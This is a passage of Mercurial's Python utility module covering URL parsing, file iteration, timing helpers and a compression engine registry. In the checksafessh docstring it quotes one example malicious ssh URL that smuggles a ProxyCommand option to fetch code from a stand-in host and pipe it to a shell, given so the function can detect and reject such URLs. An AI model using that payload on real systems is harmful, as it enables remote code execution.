2489 2511 # files approximately as "fast" files and use the fast (unsafe) code path,
2490 2512 # to minimize the performance impact.
2491 2513 if sys.version_info >= (2, 7, 4):
2492 2514 # fp.readline deals with EINTR correctly, use it as a workaround.
2493 2515 def _safeiterfile(fp):
2494 2516 return iter(fp.readline, '')
2495 2517 else:
2496 2518 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2497 2519 # note: this may block longer than necessary because of bufsize.
2498 2520 def _safeiterfile(fp, bufsize=4096):
2499 2521 fd = fp.fileno()
2500 2522 line = ''
2501 2523 while True:
2502 2524 try:
2503 2525 buf = os.read(fd, bufsize)
2504 2526 except OSError as ex:
2505 2527 # os.read only raises EINTR before any data is read
2506 2528 if ex.errno == errno.EINTR:
2507 2529 continue
2508 2530 else:
2509 2531 raise
2510 2532 line += buf
2511 2533 if '\n' in buf:
2512 2534 splitted = line.splitlines(True)
2513 2535 line = ''
2514 2536 for l in splitted:
2515 2537 if l[-1] == '\n':
2516 2538 yield l
2517 2539 else:
2518 2540 line = l
2519 2541 if not buf:
2520 2542 break
2521 2543 if line:
2522 2544 yield line
2523 2545
2524 2546 def iterfile(fp):
2525 2547 fastpath = True
2526 2548 if type(fp) is file:
2527 2549 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2528 2550 if fastpath:
2529 2551 return fp
2530 2552 else:
2531 2553 return _safeiterfile(fp)
2532 2554 else:
2533 2555 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2534 2556 def iterfile(fp):
2535 2557 return fp
2536 2558
2537 2559 def iterlines(iterator):
2538 2560 for chunk in iterator:
2539 2561 for line in chunk.splitlines():
2540 2562 yield line
2541 2563
2542 2564 def expandpath(path):
2543 2565 return os.path.expanduser(os.path.expandvars(path))
2544 2566
2545 2567 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2546 2568 """Return the result of interpolating items in the mapping into string s.
2547 2569
2548 2570 prefix is a single character string, or a two character string with
2549 2571 a backslash as the first character if the prefix needs to be escaped in
2550 2572 a regular expression.
2551 2573
2552 2574 fn is an optional function that will be applied to the replacement text
2553 2575 just before replacement.
2554 2576
2555 2577 escape_prefix is an optional flag that allows using doubled prefix for
2556 2578 its escaping.
2557 2579 """
2558 2580 fn = fn or (lambda s: s)
2559 2581 patterns = '|'.join(mapping.keys())
2560 2582 if escape_prefix:
2561 2583 patterns += '|' + prefix
2562 2584 if len(prefix) > 1:
2563 2585 prefix_char = prefix[1:]
2564 2586 else:
2565 2587 prefix_char = prefix
2566 2588 mapping[prefix_char] = prefix_char
2567 2589 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2568 2590 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2569 2591
2570 2592 def getport(port):
2571 2593 """Return the port for a given network service.
2572 2594
2573 2595 If port is an integer, it's returned as is. If it's a string, it's
2574 2596 looked up using socket.getservbyname(). If there's no matching
2575 2597 service, error.Abort is raised.
2576 2598 """
2577 2599 try:
2578 2600 return int(port)
2579 2601 except ValueError:
2580 2602 pass
2581 2603
2582 2604 try:
2583 2605 return socket.getservbyname(pycompat.sysstr(port))
2584 2606 except socket.error:
2585 2607 raise error.Abort(_("no port number associated with service '%s'")
2586 2608 % port)
2587 2609
2588 2610 class url(object):
2589 2611 r"""Reliable URL parser.
2590 2612
2591 2613 This parses URLs and provides attributes for the following
2592 2614 components:
2593 2615
2594 2616 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2595 2617
2596 2618 Missing components are set to None. The only exception is
2597 2619 fragment, which is set to '' if present but empty.
2598 2620
2599 2621 If parsefragment is False, fragment is included in query. If
2600 2622 parsequery is False, query is included in path. If both are
2601 2623 False, both fragment and query are included in path.
2602 2624
2603 2625 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2604 2626
2605 2627 Note that for backward compatibility reasons, bundle URLs do not
2606 2628 take host names. That means 'bundle://../' has a path of '../'.
2607 2629
2608 2630 Examples:
2609 2631
2610 2632 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2611 2633 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2612 2634 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2613 2635 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2614 2636 >>> url(b'file:///home/joe/repo')
2615 2637 <url scheme: 'file', path: '/home/joe/repo'>
2616 2638 >>> url(b'file:///c:/temp/foo/')
2617 2639 <url scheme: 'file', path: 'c:/temp/foo/'>
2618 2640 >>> url(b'bundle:foo')
2619 2641 <url scheme: 'bundle', path: 'foo'>
2620 2642 >>> url(b'bundle://../foo')
2621 2643 <url scheme: 'bundle', path: '../foo'>
2622 2644 >>> url(br'c:\foo\bar')
2623 2645 <url path: 'c:\\foo\\bar'>
2624 2646 >>> url(br'\\blah\blah\blah')
2625 2647 <url path: '\\\\blah\\blah\\blah'>
2626 2648 >>> url(br'\\blah\blah\blah#baz')
2627 2649 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2628 2650 >>> url(br'file:///C:\users\me')
2629 2651 <url scheme: 'file', path: 'C:\\users\\me'>
2630 2652
2631 2653 Authentication credentials:
2632 2654
2633 2655 >>> url(b'ssh://joe:xyz@x/repo')
2634 2656 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2635 2657 >>> url(b'ssh://joe@x/repo')
2636 2658 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2637 2659
2638 2660 Query strings and fragments:
2639 2661
2640 2662 >>> url(b'http://host/a?b#c')
2641 2663 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2642 2664 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2643 2665 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2644 2666
2645 2667 Empty path:
2646 2668
2647 2669 >>> url(b'')
2648 2670 <url path: ''>
2649 2671 >>> url(b'#a')
2650 2672 <url path: '', fragment: 'a'>
2651 2673 >>> url(b'http://host/')
2652 2674 <url scheme: 'http', host: 'host', path: ''>
2653 2675 >>> url(b'http://host/#a')
2654 2676 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2655 2677
2656 2678 Only scheme:
2657 2679
2658 2680 >>> url(b'http:')
2659 2681 <url scheme: 'http'>
2660 2682 """
2661 2683
2662 2684 _safechars = "!~*'()+"
2663 2685 _safepchars = "/!~*'()+:\\"
2664 2686 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2665 2687
2666 2688 def __init__(self, path, parsequery=True, parsefragment=True):
2667 2689 # We slowly chomp away at path until we have only the path left
2668 2690 self.scheme = self.user = self.passwd = self.host = None
2669 2691 self.port = self.path = self.query = self.fragment = None
2670 2692 self._localpath = True
2671 2693 self._hostport = ''
2672 2694 self._origpath = path
2673 2695
2674 2696 if parsefragment and '#' in path:
2675 2697 path, self.fragment = path.split('#', 1)
2676 2698
2677 2699 # special case for Windows drive letters and UNC paths
2678 2700 if hasdriveletter(path) or path.startswith('\\\\'):
2679 2701 self.path = path
2680 2702 return
2681 2703
2682 2704 # For compatibility reasons, we can't handle bundle paths as
2683 2705 # normal URLS
2684 2706 if path.startswith('bundle:'):
2685 2707 self.scheme = 'bundle'
2686 2708 path = path[7:]
2687 2709 if path.startswith('//'):
2688 2710 path = path[2:]
2689 2711 self.path = path
2690 2712 return
2691 2713
2692 2714 if self._matchscheme(path):
2693 2715 parts = path.split(':', 1)
2694 2716 if parts[0]:
2695 2717 self.scheme, path = parts
2696 2718 self._localpath = False
2697 2719
2698 2720 if not path:
2699 2721 path = None
2700 2722 if self._localpath:
2701 2723 self.path = ''
2702 2724 return
2703 2725 else:
2704 2726 if self._localpath:
2705 2727 self.path = path
2706 2728 return
2707 2729
2708 2730 if parsequery and '?' in path:
2709 2731 path, self.query = path.split('?', 1)
2710 2732 if not path:
2711 2733 path = None
2712 2734 if not self.query:
2713 2735 self.query = None
2714 2736
2715 2737 # // is required to specify a host/authority
2716 2738 if path and path.startswith('//'):
2717 2739 parts = path[2:].split('/', 1)
2718 2740 if len(parts) > 1:
2719 2741 self.host, path = parts
2720 2742 else:
2721 2743 self.host = parts[0]
2722 2744 path = None
2723 2745 if not self.host:
2724 2746 self.host = None
2725 2747 # path of file:///d is /d
2726 2748 # path of file:///d:/ is d:/, not /d:/
2727 2749 if path and not hasdriveletter(path):
2728 2750 path = '/' + path
2729 2751
2730 2752 if self.host and '@' in self.host:
2731 2753 self.user, self.host = self.host.rsplit('@', 1)
2732 2754 if ':' in self.user:
2733 2755 self.user, self.passwd = self.user.split(':', 1)
2734 2756 if not self.host:
2735 2757 self.host = None
2736 2758
2737 2759 # Don't split on colons in IPv6 addresses without ports
2738 2760 if (self.host and ':' in self.host and
2739 2761 not (self.host.startswith('[') and self.host.endswith(']'))):
2740 2762 self._hostport = self.host
2741 2763 self.host, self.port = self.host.rsplit(':', 1)
2742 2764 if not self.host:
2743 2765 self.host = None
2744 2766
2745 2767 if (self.host and self.scheme == 'file' and
2746 2768 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2747 2769 raise error.Abort(_('file:// URLs can only refer to localhost'))
2748 2770
2749 2771 self.path = path
2750 2772
2751 2773 # leave the query string escaped
2752 2774 for a in ('user', 'passwd', 'host', 'port',
2753 2775 'path', 'fragment'):
2754 2776 v = getattr(self, a)
2755 2777 if v is not None:
2756 2778 setattr(self, a, urlreq.unquote(v))
2757 2779
2758 2780 @encoding.strmethod
2759 2781 def __repr__(self):
2760 2782 attrs = []
2761 2783 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2762 2784 'query', 'fragment'):
2763 2785 v = getattr(self, a)
2764 2786 if v is not None:
2765 2787 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2766 2788 return '<url %s>' % ', '.join(attrs)
2767 2789
2768 2790 def __bytes__(self):
2769 2791 r"""Join the URL's components back into a URL string.
2770 2792
2771 2793 Examples:
2772 2794
2773 2795 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2774 2796 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2775 2797 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2776 2798 'http://user:pw@host:80/?foo=bar&baz=42'
2777 2799 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2778 2800 'http://user:pw@host:80/?foo=bar%3dbaz'
2779 2801 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2780 2802 'ssh://user:pw@[::1]:2200//home/joe#'
2781 2803 >>> bytes(url(b'http://localhost:80//'))
2782 2804 'http://localhost:80//'
2783 2805 >>> bytes(url(b'http://localhost:80/'))
2784 2806 'http://localhost:80/'
2785 2807 >>> bytes(url(b'http://localhost:80'))
2786 2808 'http://localhost:80/'
2787 2809 >>> bytes(url(b'bundle:foo'))
2788 2810 'bundle:foo'
2789 2811 >>> bytes(url(b'bundle://../foo'))
2790 2812 'bundle:../foo'
2791 2813 >>> bytes(url(b'path'))
2792 2814 'path'
2793 2815 >>> bytes(url(b'file:///tmp/foo/bar'))
2794 2816 'file:///tmp/foo/bar'
2795 2817 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2796 2818 'file:///c:/tmp/foo/bar'
2797 2819 >>> print(url(br'bundle:foo\bar'))
2798 2820 bundle:foo\bar
2799 2821 >>> print(url(br'file:///D:\data\hg'))
2800 2822 file:///D:\data\hg
2801 2823 """
2802 2824 if self._localpath:
2803 2825 s = self.path
2804 2826 if self.scheme == 'bundle':
2805 2827 s = 'bundle:' + s
2806 2828 if self.fragment:
2807 2829 s += '#' + self.fragment
2808 2830 return s
2809 2831
2810 2832 s = self.scheme + ':'
2811 2833 if self.user or self.passwd or self.host:
2812 2834 s += '//'
2813 2835 elif self.scheme and (not self.path or self.path.startswith('/')
2814 2836 or hasdriveletter(self.path)):
2815 2837 s += '//'
2816 2838 if hasdriveletter(self.path):
2817 2839 s += '/'
2818 2840 if self.user:
2819 2841 s += urlreq.quote(self.user, safe=self._safechars)
2820 2842 if self.passwd:
2821 2843 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2822 2844 if self.user or self.passwd:
2823 2845 s += '@'
2824 2846 if self.host:
2825 2847 if not (self.host.startswith('[') and self.host.endswith(']')):
2826 2848 s += urlreq.quote(self.host)
2827 2849 else:
2828 2850 s += self.host
2829 2851 if self.port:
2830 2852 s += ':' + urlreq.quote(self.port)
2831 2853 if self.host:
2832 2854 s += '/'
2833 2855 if self.path:
2834 2856 # TODO: similar to the query string, we should not unescape the
2835 2857 # path when we store it, the path might contain '%2f' = '/',
2836 2858 # which we should *not* escape.
2837 2859 s += urlreq.quote(self.path, safe=self._safepchars)
2838 2860 if self.query:
2839 2861 # we store the query in escaped form.
2840 2862 s += '?' + self.query
2841 2863 if self.fragment is not None:
2842 2864 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2843 2865 return s
2844 2866
2845 2867 __str__ = encoding.strmethod(__bytes__)
2846 2868
2847 2869 def authinfo(self):
2848 2870 user, passwd = self.user, self.passwd
2849 2871 try:
2850 2872 self.user, self.passwd = None, None
2851 2873 s = bytes(self)
2852 2874 finally:
2853 2875 self.user, self.passwd = user, passwd
2854 2876 if not self.user:
2855 2877 return (s, None)
2856 2878 # authinfo[1] is passed to urllib2 password manager, and its
2857 2879 # URIs must not contain credentials. The host is passed in the
2858 2880 # URIs list because Python < 2.4.3 uses only that to search for
2859 2881 # a password.
2860 2882 return (s, (None, (s, self.host),
2861 2883 self.user, self.passwd or ''))
2862 2884
2863 2885 def isabs(self):
2864 2886 if self.scheme and self.scheme != 'file':
2865 2887 return True # remote URL
2866 2888 if hasdriveletter(self.path):
2867 2889 return True # absolute for our purposes - can't be joined()
2868 2890 if self.path.startswith(br'\\'):
2869 2891 return True # Windows UNC path
2870 2892 if self.path.startswith('/'):
2871 2893 return True # POSIX-style
2872 2894 return False
2873 2895
2874 2896 def localpath(self):
2875 2897 if self.scheme == 'file' or self.scheme == 'bundle':
2876 2898 path = self.path or '/'
2877 2899 # For Windows, we need to promote hosts containing drive
2878 2900 # letters to paths with drive letters.
2879 2901 if hasdriveletter(self._hostport):
2880 2902 path = self._hostport + '/' + self.path
2881 2903 elif (self.host is not None and self.path
2882 2904 and not hasdriveletter(path)):
2883 2905 path = '/' + path
2884 2906 return path
2885 2907 return self._origpath
2886 2908
2887 2909 def islocal(self):
2888 2910 '''whether localpath will return something that posixfile can open'''
2889 2911 return (not self.scheme or self.scheme == 'file'
2890 2912 or self.scheme == 'bundle')
2891 2913
2892 2914 def hasscheme(path):
2893 2915 return bool(url(path).scheme)
2894 2916
2895 2917 def hasdriveletter(path):
2896 2918 return path and path[1:2] == ':' and path[0:1].isalpha()
2897 2919
2898 2920 def urllocalpath(path):
2899 2921 return url(path, parsequery=False, parsefragment=False).localpath()
2900 2922
2901 2923 def checksafessh(path):
2902 2924 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2903 2925
2904 2926 This is a sanity check for ssh urls. ssh will parse the first item as
2905 2927 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2906 2928 Let's prevent these potentially exploited urls entirely and warn the
2907 2929 user.
2908 2930
2909 2931 Raises an error.Abort when the url is unsafe.
2910 2932 """
2911 2933 path = urlreq.unquote(path)
2912 2934 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2913 2935 raise error.Abort(_('potentially unsafe url: %r') %
2914 2936 (pycompat.bytestr(path),))
2915 2937
2916 2938 def hidepassword(u):
2917 2939 '''hide user credential in a url string'''
2918 2940 u = url(u)
2919 2941 if u.passwd:
2920 2942 u.passwd = '***'
2921 2943 return bytes(u)
2922 2944
2923 2945 def removeauth(u):
2924 2946 '''remove all authentication information from a url string'''
2925 2947 u = url(u)
2926 2948 u.user = u.passwd = None
2927 2949 return bytes(u)
2928 2950
2929 2951 timecount = unitcountfn(
2930 2952 (1, 1e3, _('%.0f s')),
2931 2953 (100, 1, _('%.1f s')),
2932 2954 (10, 1, _('%.2f s')),
2933 2955 (1, 1, _('%.3f s')),
2934 2956 (100, 0.001, _('%.1f ms')),
2935 2957 (10, 0.001, _('%.2f ms')),
2936 2958 (1, 0.001, _('%.3f ms')),
2937 2959 (100, 0.000001, _('%.1f us')),
2938 2960 (10, 0.000001, _('%.2f us')),
2939 2961 (1, 0.000001, _('%.3f us')),
2940 2962 (100, 0.000000001, _('%.1f ns')),
2941 2963 (10, 0.000000001, _('%.2f ns')),
2942 2964 (1, 0.000000001, _('%.3f ns')),
2943 2965 )
2944 2966
2945 2967 @attr.s
2946 2968 class timedcmstats(object):
2947 2969 """Stats information produced by the timedcm context manager on entering."""
2948 2970
2949 2971 # the starting value of the timer as a float (meaning and resulution is
2950 2972 # platform dependent, see util.timer)
2951 2973 start = attr.ib(default=attr.Factory(lambda: timer()))
2952 2974 # the number of seconds as a floating point value; starts at 0, updated when
2953 2975 # the context is exited.
2954 2976 elapsed = attr.ib(default=0)
2955 2977 # the number of nested timedcm context managers.
2956 2978 level = attr.ib(default=1)
2957 2979
2958 2980 def __bytes__(self):
2959 2981 return timecount(self.elapsed) if self.elapsed else '<unknown>'
2960 2982
2961 2983 __str__ = encoding.strmethod(__bytes__)
2962 2984
2963 2985 @contextlib.contextmanager
2964 2986 def timedcm(whencefmt, *whenceargs):
2965 2987 """A context manager that produces timing information for a given context.
2966 2988
2967 2989 On entering a timedcmstats instance is produced.
2968 2990
2969 2991 This context manager is reentrant.
2970 2992
2971 2993 """
2972 2994 # track nested context managers
2973 2995 timedcm._nested += 1
2974 2996 timing_stats = timedcmstats(level=timedcm._nested)
2975 2997 try:
2976 2998 with tracing.log(whencefmt, *whenceargs):
2977 2999 yield timing_stats
2978 3000 finally:
2979 3001 timing_stats.elapsed = timer() - timing_stats.start
2980 3002 timedcm._nested -= 1
2981 3003
2982 3004 timedcm._nested = 0
2983 3005
2984 3006 def timed(func):
2985 3007 '''Report the execution time of a function call to stderr.
2986 3008
2987 3009 During development, use as a decorator when you need to measure
2988 3010 the cost of a function, e.g. as follows:
2989 3011
2990 3012 @util.timed
2991 3013 def foo(a, b, c):
2992 3014 pass
2993 3015 '''
2994 3016
2995 3017 def wrapper(*args, **kwargs):
2996 3018 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
2997 3019 result = func(*args, **kwargs)
2998 3020 stderr = procutil.stderr
2999 3021 stderr.write('%s%s: %s\n' % (
3000 3022 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3001 3023 time_stats))
3002 3024 return result
3003 3025 return wrapper
3004 3026
3005 3027 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3006 3028 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3007 3029
3008 3030 def sizetoint(s):
3009 3031 '''Convert a space specifier to a byte count.
3010 3032
3011 3033 >>> sizetoint(b'30')
3012 3034 30
3013 3035 >>> sizetoint(b'2.2kb')
3014 3036 2252
3015 3037 >>> sizetoint(b'6M')
3016 3038 6291456
3017 3039 '''
3018 3040 t = s.strip().lower()
3019 3041 try:
3020 3042 for k, u in _sizeunits:
3021 3043 if t.endswith(k):
3022 3044 return int(float(t[:-len(k)]) * u)
3023 3045 return int(t)
3024 3046 except ValueError:
3025 3047 raise error.ParseError(_("couldn't parse size: %s") % s)
3026 3048
3027 3049 class hooks(object):
3028 3050 '''A collection of hook functions that can be used to extend a
3029 3051 function's behavior. Hooks are called in lexicographic order,
3030 3052 based on the names of their sources.'''
3031 3053
3032 3054 def __init__(self):
3033 3055 self._hooks = []
3034 3056
3035 3057 def add(self, source, hook):
3036 3058 self._hooks.append((source, hook))
3037 3059
3038 3060 def __call__(self, *args):
3039 3061 self._hooks.sort(key=lambda x: x[0])
3040 3062 results = []
3041 3063 for source, hook in self._hooks:
3042 3064 results.append(hook(*args))
3043 3065 return results
3044 3066
3045 3067 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3046 3068 '''Yields lines for a nicely formatted stacktrace.
3047 3069 Skips the 'skip' last entries, then return the last 'depth' entries.
3048 3070 Each file+linenumber is formatted according to fileline.
3049 3071 Each line is formatted according to line.
3050 3072 If line is None, it yields:
3051 3073 length of longest filepath+line number,
3052 3074 filepath+linenumber,
3053 3075 function
3054 3076
3055 3077 Not be used in production code but very convenient while developing.
3056 3078 '''
3057 3079 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3058 3080 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3059 3081 ][-depth:]
3060 3082 if entries:
3061 3083 fnmax = max(len(entry[0]) for entry in entries)
3062 3084 for fnln, func in entries:
3063 3085 if line is None:
3064 3086 yield (fnmax, fnln, func)
3065 3087 else:
3066 3088 yield line % (fnmax, fnln, func)
3067 3089
3068 3090 def debugstacktrace(msg='stacktrace', skip=0,
3069 3091 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3070 3092 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3071 3093 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3072 3094 By default it will flush stdout first.
3073 3095 It can be used everywhere and intentionally does not require an ui object.
3074 3096 Not be used in production code but very convenient while developing.
3075 3097 '''
3076 3098 if otherf:
3077 3099 otherf.flush()
3078 3100 f.write('%s at:\n' % msg.rstrip())
3079 3101 for line in getstackframes(skip + 1, depth=depth):
3080 3102 f.write(line)
3081 3103 f.flush()
3082 3104
3083 3105 class dirs(object):
3084 3106 '''a multiset of directory names from a dirstate or manifest'''
3085 3107
3086 3108 def __init__(self, map, skip=None):
3087 3109 self._dirs = {}
3088 3110 addpath = self.addpath
3089 3111 if safehasattr(map, 'iteritems') and skip is not None:
3090 3112 for f, s in map.iteritems():
3091 3113 if s[0] != skip:
3092 3114 addpath(f)
3093 3115 else:
3094 3116 for f in map:
3095 3117 addpath(f)
3096 3118
3097 3119 def addpath(self, path):
3098 3120 dirs = self._dirs
3099 3121 for base in finddirs(path):
3100 3122 if base in dirs:
3101 3123 dirs[base] += 1
3102 3124 return
3103 3125 dirs[base] = 1
3104 3126
3105 3127 def delpath(self, path):
3106 3128 dirs = self._dirs
3107 3129 for base in finddirs(path):
3108 3130 if dirs[base] > 1:
3109 3131 dirs[base] -= 1
3110 3132 return
3111 3133 del dirs[base]
3112 3134
3113 3135 def __iter__(self):
3114 3136 return iter(self._dirs)
3115 3137
3116 3138 def __contains__(self, d):
3117 3139 return d in self._dirs
3118 3140
3119 3141 if safehasattr(parsers, 'dirs'):
3120 3142 dirs = parsers.dirs
3121 3143
3122 3144 def finddirs(path):
3123 3145 pos = path.rfind('/')
3124 3146 while pos != -1:
3125 3147 yield path[:pos]
3126 3148 pos = path.rfind('/', 0, pos)
3127 3149
3128 3150 # compression code
3129 3151
3130 3152 SERVERROLE = 'server'
3131 3153 CLIENTROLE = 'client'
3132 3154
3133 3155 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3134 3156 (u'name', u'serverpriority',
3135 3157 u'clientpriority'))
3136 3158
3137 3159 class compressormanager(object):
3138 3160 """Holds registrations of various compression engines.
3139 3161
3140 3162 This class essentially abstracts the differences between compression
3141 3163 engines to allow new compression formats to be added easily, possibly from
3142 3164 extensions.
3143 3165
3144 3166 Compressors are registered against the global instance by calling its
3145 3167 ``register()`` method.
3146 3168 """
3147 3169 def __init__(self):
3148 3170 self._engines = {}
3149 3171 # Bundle spec human name to engine name.
3150 3172 self._bundlenames = {}
3151 3173 # Internal bundle identifier to engine name.
3152 3174 self._bundletypes = {}
3153 3175 # Revlog header to engine name.
3154 3176 self._revlogheaders = {}
3155 3177 # Wire proto identifier to engine name.
3156 3178 self._wiretypes = {}
3157 3179
3158 3180 def __getitem__(self, key):
3159 3181 return self._engines[key]
3160 3182
3161 3183 def __contains__(self, key):
3162 3184 return key in self._engines
3163 3185
3164 3186 def __iter__(self):
3165 3187 return iter(self._engines.keys())
3166 3188
3167 3189 def register(self, engine):
3168 3190 """Register a compression engine with the manager.
3169 3191
3170 3192 The argument must be a ``compressionengine`` instance.
3171 3193 """
3172 3194 if not isinstance(engine, compressionengine):
3173 3195 raise ValueError(_('argument must be a compressionengine'))
3174 3196
3175 3197 name = engine.name()
3176 3198
3177 3199 if name in self._engines:
3178 3200 raise error.Abort(_('compression engine %s already registered') %
3179 3201 name)
3180 3202
3181 3203 bundleinfo = engine.bundletype()
3182 3204 if bundleinfo:
3183 3205 bundlename, bundletype = bundleinfo
3184 3206
3185 3207 if bundlename in self._bundlenames:
3186 3208 raise error.Abort(_('bundle name %s already registered') %
3187 3209 bundlename)
3188 3210 if bundletype in self._bundletypes:
3189 3211 raise error.Abort(_('bundle type %s already registered by %s') %
3190 3212 (bundletype, self._bundletypes[bundletype]))
3191 3213
3192 3214 # No external facing name declared.
3193 3215 if bundlename:
3194 3216 self._bundlenames[bundlename] = name
3195 3217
3196 3218 self._bundletypes[bundletype] = name
3197 3219
3198 3220 wiresupport = engine.wireprotosupport()
3199 3221 if wiresupport:
3200 3222 wiretype = wiresupport.name
3201 3223 if wiretype in self._wiretypes:
3202 3224 raise error.Abort(_('wire protocol compression %s already '
3203 3225 'registered by %s') %
3204 3226 (wiretype, self._wiretypes[wiretype]))
3205 3227
3206 3228 self._wiretypes[wiretype] = name
3207 3229
3208 3230 revlogheader = engine.revlogheader()
3209 3231 if revlogheader and revlogheader in self._revlogheaders:
3210 3232 raise error.Abort(_('revlog header %s already registered by %s') %
3211 3233 (revlogheader, self._revlogheaders[revlogheader]))
3212 3234
3213 3235 if revlogheader:
3214 3236 self._revlogheaders[revlogheader] = name
3215 3237
3216 3238 self._engines[name] = engine
3217 3239
3218 3240 @property
3219 3241 def supportedbundlenames(self):
3220 3242 return set(self._bundlenames.keys())
3221 3243
3222 3244 @property
3223 3245 def supportedbundletypes(self):
3224 3246 return set(self._bundletypes.keys())
3225 3247
3226 3248 def forbundlename(self, bundlename):
3227 3249 """Obtain a compression engine registered to a bundle name.
3228 3250
3229 3251 Will raise KeyError if the bundle type isn't registered.
3230 3252
3231 3253 Will abort if the engine is known but not available.
3232 3254 """
3233 3255 engine = self._engines[self._bundlenames[bundlename]]
3234 3256 if not engine.available():
3235 3257 raise error.Abort(_('compression engine %s could not be loaded') %
3236 3258 engine.name())
3237 3259 return engine
3238 3260
3239 3261 def forbundletype(self, bundletype):
3240 3262 """Obtain a compression engine registered to a bundle type.
3241 3263
3242 3264 Will raise KeyError if the bundle type isn't registered.
3243 3265
3244 3266 Will abort if the engine is known but not available.
3245 3267 """
3246 3268 engine = self._engines[self._bundletypes[bundletype]]
3247 3269 if not engine.available():
3248 3270 raise error.Abort(_('compression engine %s could not be loaded') %
3249 3271 engine.name())
3250 3272 return engine
3251 3273
3252 3274 def supportedwireengines(self, role, onlyavailable=True):
3253 3275 """Obtain compression engines that support the wire protocol.
3254 3276
3255 3277 Returns a list of engines in prioritized order, most desired first.
3256 3278
3257 3279 If ``onlyavailable`` is set, filter out engines that can't be
3258 3280 loaded.
3259 3281 """
3260 3282 assert role in (SERVERROLE, CLIENTROLE)
3261 3283
3262 3284 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3263 3285
3264 3286 engines = [self._engines[e] for e in self._wiretypes.values()]
3265 3287 if onlyavailable:
3266 3288 engines = [e for e in engines if e.available()]
3267 3289
3268 3290 def getkey(e):
3269 3291 # Sort first by priority, highest first. In case of tie, sort
3270 3292 # alphabetically. This is arbitrary, but ensures output is
3271 3293 # stable.
3272 3294 w = e.wireprotosupport()
3273 3295 return -1 * getattr(w, attr), w.name
3274 3296
3275 3297 return list(sorted(engines, key=getkey))
3276 3298
3277 3299 def forwiretype(self, wiretype):
3278 3300 engine = self._engines[self._wiretypes[wiretype]]
3279 3301 if not engine.available():
3280 3302 raise error.Abort(_('compression engine %s could not be loaded') %
3281 3303 engine.name())
3282 3304 return engine
3283 3305
3284 3306 def forrevlogheader(self, header):
3285 3307 """Obtain a compression engine registered to a revlog header.
3286 3308
3287 3309 Will raise KeyError if the revlog header value isn't registered.
3288 3310 """
3289 3311 return self._engines[self._revlogheaders[header]]
3290 3312
3291 3313 compengines = compressormanager()
3292 3314
3293 3315 class compressionengine(object):
3294 3316 """Base class for compression engines.
3295 3317
3296 3318 Compression engines must implement the interface defined by this class.
3297 3319 """
3298 3320 def name(self):
3299 3321 """Returns the name of the compression engine.
3300 3322
3301 3323 This is the key the engine is registered under.
3302 3324
3303 3325 This method must be implemented.
3304 3326 """
3305 3327 raise NotImplementedError()
3306 3328
3307 3329 def available(self):
3308 3330 """Whether the compression engine is available.
3309 3331
3310 3332 The intent of this method is to allow optional compression engines
3311 3333 that may not be available in all installations (such as engines relying
3312 3334 on C extensions that may not be present).
3313 3335 """
3314 3336 return True
3315 3337
3316 3338 def bundletype(self):
3317 3339 """Describes bundle identifiers for this engine.
3318 3340
3319 3341 If this compression engine isn't supported for bundles, returns None.
3320 3342
3321 3343 If this engine can be used for bundles, returns a 2-tuple of strings of
3322 3344 the user-facing "bundle spec" compression name and an internal
3323 3345 identifier used to denote the compression format within bundles. To
3324 3346 exclude the name from external usage, set the first element to ``None``.
3325 3347
3326 3348 If bundle compression is supported, the class must also implement
3327 3349 ``compressstream`` and `decompressorreader``.
3328 3350
3329 3351 The docstring of this method is used in the help system to tell users
3330 3352 about this engine.
3331 3353 """
3332 3354 return None
3333 3355
3334 3356 def wireprotosupport(self):
3335 3357 """Declare support for this compression format on the wire protocol.
3336 3358
3337 3359 If this compression engine isn't supported for compressing wire
3338 3360 protocol payloads, returns None.
3339 3361
